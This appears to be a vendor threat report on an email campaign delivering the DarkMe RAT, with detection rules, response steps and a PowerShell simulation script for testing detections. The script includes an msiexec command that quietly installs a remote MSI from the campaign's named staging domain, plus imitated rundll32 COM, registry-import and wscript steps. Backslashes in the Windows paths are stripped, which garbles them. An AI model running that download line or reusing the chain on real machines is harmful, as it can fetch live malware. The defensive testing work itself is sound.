DarkMe Email Campaign Widens Targeting in APT RAT Attacks
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A new campaign delivering the DarkMe spy-RAT has been observed relying on social engineering rather than software exploits. Attackers distribute a .pif file through email, which initiates a multi-stage infection chain involving MSIEXEC and several VB6-based loaders. The move away from zero-day exploitation toward high-volume social engineering suggests a shift to cheaper, broader, and less selective attack methods.
Investigation
Huntress identified the campaign after detecting a .pif file launching Windows Installer to retrieve a remote MSI package. Analysis uncovered a complex multi-stage chain involving a staging script named prnfig.wsf, registry imports, and execution of a COM object through rundll32.exe /sta. The final stage uses process hollowing to inject the DarkMe payload into the signed Microsoft binary clspack.exe.
Mitigation
Defenders should monitor for rundll32.exe launched with the /sta flag and a GUID without an accompanying DLL path. Security teams should also detect msiexec retrieving remote MSI packages over HTTPS and investigate execution of .pif files. Signed Microsoft binaries running from unusual locations such as %AppData% should receive additional scrutiny.
Response
When suspicious activity is detected, isolate the affected endpoint immediately to disrupt C2 communication and prevent data exfiltration. Terminate the hollowed clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Remove persistence created through the custom URL-protocol handler and the HKCU Run key. Reset affected user credentials and treat any locally stored cryptocurrency wallets as potentially compromised.
Attack Flow
We are still updating this part.
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
Unusual Extension of Executable Binary (via process_creation)
LOLBAS WScript / CScript (via process_creation)
Possible Remote MSI File Installation Attempt (via cmdline)
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
IOCs (HashSha256) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT
IOCs (SourceIP) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT
IOCs (DestinationIP) to detect: DarkMe Email Campaign Broadens Targeting For APT RAT
Detect C2 Communication and Staging Domain for DarkMe RAT [Windows Network Connection]
Detection of Malicious DarkMe RAT Campaign Activities [Windows Process Creation]
Simulation Execution
-
Attack Narrative & Commands: The adversary aims to deploy the DarkMe RAT to maintain persistence. To evade signature-based detection, the attacker uses
msiexecto pull a remote payload from a compromised domain (onlineview365.com). Following the initial infection, the attacker usesrundll32.exeto invoke a specific COM object via a GUID to execute code in memory, and subsequently usescmd.exeto import registry configurations from a text file to prepare the environment for awscript.exebased payload execution. -
Regression Test Script:
# DarkMe RAT Simulation Script # This script simulates the exact command lines defined in the Sigma rule. Write-Host "[+] Starting DarkMe RAT Simulation..." -ForegroundColor Cyan # 1. Simulate msiexec remote download Write-Host "[*] Simulating msiexec remote download..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Simulate rundll32 COM object execution Write-Host "[*] Simulating rundll32 COM execution..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Simulate cmd.exe registry import Write-Host "[*] Simulating cmd.exe registry import..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Simulate wscript.exe execution via cmd/rundll32 parent chain Write-Host "[*] Simulating wscript.exe execution from AppData..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # To trigger the specific parent/child rule: # Parent: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Child: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulation Complete." -ForegroundColor Green -
Cleanup Commands:
# Cleanup Simulation Artifacts Write-Host "[+] Cleaning up..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Cleanup Finished." -ForegroundColor Green